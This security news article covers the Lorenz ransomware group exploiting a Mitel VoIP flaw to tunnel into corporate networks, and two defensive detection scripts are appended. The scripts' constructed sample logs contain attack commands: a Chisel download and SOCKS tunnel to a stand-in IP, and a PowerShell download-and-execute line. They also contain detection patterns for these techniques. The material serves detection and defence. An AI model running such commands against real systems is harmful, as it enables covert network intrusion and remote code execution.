Lorenz Ransomware Goes After SMBs via Mitel VoIP Phone Systems
The ransomware gang has been seen exploiting a Mitel RCE flaw discovered in VoIP devices in April (and patched in July) to perform double-extortion attacks.
A ransomware gang has been seen using a unique initial-access tactic to exploit a vulnerability in voice-over-IP (VoIP) appliances to breach corporate phone systems, before pivoting to corporate networks to commit double-extortion attacks.
Researchers from Arctic Wolf Labs have observed the Lorenz ransomware group exploiting a flaw in Mitel MiVoice Connect VoIP appliances. The bug, tracked as CVE-2022-29499, was disclosed in April and fully patched in July; it is a remote code execution (RCE) flaw in the Mitel Service Appliance component of MiVoice Connect.
Lorenz exploited the flaw to obtain a reverse shell, after which the group leveraged Chisel, a Golang-based fast TCP/UDP tunnel that’s transported over HTTP, as a tunneling tool to breach the corporate environment, Arctic Wolf researchers said this week. The tool is “mainly useful for passing through firewalls,” according to the GitHub page.
The attacks show an evolution by threat actors to use “lesser known or monitored assets” to access networks and perform further nefarious activity to avoid detection, according to Arctic Wolf.
“In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and Internet of Things (IoT) devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected,” the researchers wrote.
The activity underscores the need for enterprises to monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices, researchers said.
Mitel identified CVE-2022-29499 on April 19 and, as a workaround, provided a script for releases 19.2 SP3 and earlier and R14.x and earlier, before releasing MiVoice Connect version R19.3 in July to fully remediate the flaw.
Attack Details
Lorenz is a ransomware group that has been active since at least February 2021, and, like many of its cohorts, performs double extortion of its victims by exfiltrating data and threatening to expose it online if victims don’t pay the desired ransom in a certain time frame.
Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico, according to Arctic Wolf.
In the attacks that researchers identified, the initial malicious activity originated from a Mitel appliance sitting on the network perimeter. After establishing a reverse shell, Lorenz used the Mitel device's command line interface to create a hidden directory and then downloaded a compiled binary of Chisel directly from GitHub via Wget.
Threat actors then renamed the Chisel binary to “mem,” unzipped it, and executed it to establish a connection back to a Chisel server listening at hxxps[://]137.184.181[.]252[:]8443, researchers said. Lorenz skipped TLS certificate verification and turned the client into a SOCKS proxy.
It’s worth noting that Lorenz waited nearly a month after breaching the corporate network to conduct additional ransomware activity, researchers said. Upon returning to the Mitel device, threat actors interacted with a Web shell named “pdf_import_export.php.” Shortly thereafter, the Mitel device started a reverse shell and Chisel tunnel again so threat actors could jump onto the corporate network, according to Arctic Wolf.
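The staging sequence above (hidden directory, Wget from GitHub, binary renamed to a generic name, Chisel client started with certificate checks off and a SOCKS remote) is detectable from command-audit data on the appliance itself, which is exactly the kind of device the researchers say goes unmonitored. The following is an added example, not Arctic Wolf's or Mitel's code: it scans a simplified, assumed audit format (`<iso-timestamp> <user>: <command line>`) for behavioural indicators rather than for the string "chisel", since the binary in this case was renamed to "mem". Every log line is constructed, and 192.0.2.10 is documentation address space, not the server named in the report.

```python
"""Scan command-audit lines from a perimeter appliance for the Chisel staging
sequence described above: a hidden working directory, a tooling download from
a public release page, execution out of that directory, and a tunnel client
started with TLS verification disabled and a SOCKS remote on an external IP.

Added example, not Arctic Wolf's or Mitel's code.  The log format
("<iso-timestamp> <user>: <command line>") is an assumed, simplified audit
format and every sample line is constructed; 192.0.2.10 is documentation
address space, not the server named in the report.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Behavioural rules.  None of them keys on the file name "chisel": the binary
# in the report was renamed to "mem", so we match what the process is asked
# to do rather than what it is called.
RULES = {
    "hidden-dir-create": re.compile(r"\bmkdir\b.*(?:^|/|\s)\.[^./\s]"),
    "tool-download-release": re.compile(r"\b(?:wget|curl)\b.*github\.com/\S+/releases/download/"),
    "exec-from-hidden-dir": re.compile(r"^\S*/\.[^./\s]"),
    "chisel-client-socks": re.compile(r"\bclient\b.*\bR?:?socks\b"),
    "tls-verify-disabled": re.compile(
        r"--tls-skip-verify|--no-check-certificate|--insecure|(?:^|\s)-k(?:\s|$)"),
    "outbound-to-bare-ip": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?"),
}
LINE_RE = re.compile(r"^(\S+)\s+(\S+):\s+(.*)$")

# Distinct rules one user must trip before the sequence is escalated as
# probable tunnel staging rather than an isolated oddity.
STAGING_THRESHOLD = 3

# Constructed sample audit log (hypothetical format, see module docstring).
SAMPLE_LOG = """\
2022-08-01T10:00:03Z www-data: ls -la /var/www
2022-08-01T10:00:41Z www-data: mkdir -p /tmp/.x
2022-08-01T10:01:02Z www-data: wget -q https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz -O /tmp/.x/c.gz
2022-08-01T10:01:10Z www-data: gunzip /tmp/.x/c.gz
2022-08-01T10:01:15Z www-data: mv /tmp/.x/c /tmp/.x/mem
2022-08-01T10:01:20Z www-data: chmod +x /tmp/.x/mem
2022-08-01T10:01:31Z www-data: /tmp/.x/mem client --tls-skip-verify https://192.0.2.10:8443 R:socks
2022-08-01T10:05:00Z root: /usr/bin/tail -n 50 /var/log/messages
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    user: str
    rule: str
    command: str


def scan(log_text):
    """Return one Finding per (line, rule) match; malformed lines are skipped."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate truncated or non-conforming lines
        _ts, user, cmd = m.groups()
        for rule, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append(Finding(line_no, user, rule, cmd))
    return findings


def assess(log_text):
    """Group findings per user and escalate users that trip several rules."""
    findings = scan(log_text)
    rules_by_user = defaultdict(set)
    for f in findings:
        rules_by_user[f.user].add(f.rule)
    staging = sorted(u for u, r in rules_by_user.items() if len(r) >= STAGING_THRESHOLD)
    return {"findings": findings, "staging_users": staging}


if __name__ == "__main__":
    result = assess(SAMPLE_LOG)
    for f in result["findings"]:
        print(f"line {f.line_no:>3}  {f.user:<9} {f.rule:<22} {f.command}")
    print("probable tunnel staging by:", result["staging_users"])
```

Individually, a `mkdir` of a dotted directory or a `wget` from GitHub is noise; the value is in correlating several of them for one account on a device that should never be downloading tooling at all, which is why `assess` only escalates once three distinct rules fire.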
Once on the network, Lorenz obtained credentials for two privileged administrator accounts, one with local admin privileges and one with domain admin privileges, and used them to move laterally through the environment via RDP and subsequently to a domain controller.
Before encrypting files using BitLocker and Lorenz ransomware on ESXi, Lorenz exfiltrated data for double-extortion purposes via FileZilla, researchers said.
Attack Mitigation
To mitigate attacks that can leverage the Mitel flaw to launch ransomware or other threat activity, researchers recommend that organizations apply the patch as soon as possible.
Researchers also made general recommendations for reducing the risk that perimeter devices become pathways into corporate networks. One is to run external scans to assess the organization's footprint and then harden the environment accordingly. This lets enterprises discover Internet-exposed assets that administrators may not have known about, so that they can be protected, and helps define the organization's attack surface across every device exposed to the Internet, researchers noted.
Once all assets are identified, organizations should ensure that critical ones are not directly exposed to the Internet, removing a device from the perimeter if it doesn’t need to be there, researchers recommended.
Arctic Wolf also recommended that organizations enable Module Logging, Script Block Logging, and Transcription Logging in their PowerShell logging configuration and send the logs to a centralized logging solution. Captured logs should be stored off the host so that detailed forensic analysis remains possible even when threat actors take evasive action against local logs during an attack.
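Shipping Script Block Logging events off the host is only half of the job; the analyst then has to make sense of them, and Windows writes long script blocks as numbered fragments (Event ID 4104, fields MessageNumber, MessageTotal, ScriptBlockId, ScriptBlockText), so an indicator that straddles a fragment boundary is invisible to per-event matching. The following is an added example and not Arctic Wolf's tooling: it stitches 4104 fragments back together by ScriptBlockId in the XML shape that Get-WinEvent or wevtutil export, flags partial blocks whose fragments never arrived, and only then runs a few indicator patterns over the recovered text. The `<Events>` wrapper, the host name, every ScriptBlockId and all script text are constructed; the `manage-bde -on` indicator is included because the report says Lorenz used BitLocker for encryption, not because it appears in the original events.

```python
"""Reassemble PowerShell Script Block Logging events (Event ID 4104) that were
shipped off a host and triage the recovered script text.

Added example, not Arctic Wolf's code.  The <Events> wrapper, host name,
ScriptBlockIds and script text below are all constructed; the element layout
matches what Get-WinEvent/wevtutil export.  Fragments are deliberately out of
order and one block is missing a fragment, to exercise both edge cases.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Heuristic indicators run over the *reassembled* text.
INDICATORS = {
    "web-download": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "dynamic-eval": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "encoded-command": re.compile(r"-enc(?:odedcommand)?\b|FromBase64String", re.I),
    "bitlocker-enable": re.compile(r"manage-bde\s+-on\b", re.I),  # report: BitLocker used for encryption
}

# Constructed 4104 events (hypothetical IDs, host and script text).
SAMPLE_EVENTS = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID><Computer>ws01.corp.example</Computer></System>
<EventData><Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>
<Data Name="ScriptBlockText">ession $p; manage-bde -on C: -RecoveryPassword</Data>
<Data Name="ScriptBlockId">1b2f8a4c-0000-4000-8000-000000000001</Data><Data Name="Path"></Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID><Computer>ws01.corp.example</Computer></System>
<EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
<Data Name="ScriptBlockText">$c = New-Object Net.WebClient; $p = $c.DownloadString('http://192.0.2.10:8443/s'); Invoke-Expr</Data>
<Data Name="ScriptBlockId">1b2f8a4c-0000-4000-8000-000000000001</Data><Data Name="Path"></Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID><Computer>ws01.corp.example</Computer></System>
<EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">Get-ChildItem C:/Users | Measure-Object</Data>
<Data Name="ScriptBlockId">1b2f8a4c-0000-4000-8000-000000000002</Data><Data Name="Path">C:/ops/inventory.ps1</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID><Computer>ws01.corp.example</Computer></System>
<EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
<Data Name="ScriptBlockText">$x = [Convert]::FromBase64String($b)</Data>
<Data Name="ScriptBlockId">1b2f8a4c-0000-4000-8000-000000000003</Data><Data Name="Path"></Data></EventData></Event>
</Events>
"""


def _event_data(event):
    """Flatten <EventData><Data Name=...> children into a dict."""
    return {d.get("Name"): (d.text or "") for d in event.findall("e:EventData/e:Data", NS)}


def reassemble(xml_text):
    """Stitch 4104 fragments by ScriptBlockId, ordered by MessageNumber."""
    root = ET.fromstring(xml_text)
    fragments, meta = defaultdict(list), {}
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        d = _event_data(ev)
        sbid = d["ScriptBlockId"]
        fragments[sbid].append((int(d["MessageNumber"]), d["ScriptBlockText"]))
        meta[sbid] = {"computer": ev.findtext("e:System/e:Computer", namespaces=NS),
                      "path": d.get("Path", ""), "total": int(d["MessageTotal"])}
    blocks = {}
    for sbid, parts in fragments.items():
        parts.sort()  # arrival order is not guaranteed once logs are forwarded
        blocks[sbid] = {**meta[sbid], "text": "".join(t for _, t in parts),
                        "complete": len(parts) == meta[sbid]["total"]}
    return blocks


def triage(xml_text):
    """Indicator hits per reassembled block; partial blocks are still scanned."""
    hits = []
    for sbid, b in reassemble(xml_text).items():
        rules = sorted(r for r, p in INDICATORS.items() if p.search(b["text"]))
        if rules:
            hits.append({"script_block_id": sbid, "computer": b["computer"],
                         "complete": b["complete"], "rules": rules})
    return hits


def fragment_hits(xml_text):
    """Rules that fire when each fragment is scanned on its own (the naive way)."""
    seen = set()
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        text = _event_data(ev).get("ScriptBlockText", "")
        seen.update(r for r, p in INDICATORS.items() if p.search(text))
    return seen


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(h)
    print("missed by per-fragment matching:", set().union(*(set(h["rules"]) for h in triage(SAMPLE_EVENTS))) - fragment_hits(SAMPLE_EVENTS))
```

In the constructed sample, `Invoke-Expression` is split as `Invoke-Expr` / `ession` across two fragments, so `fragment_hits` never sees it while `triage` does; the third block is flagged even though its second fragment is absent, which is the behaviour you want when an attacker has cleared the local log after the first fragment was forwarded.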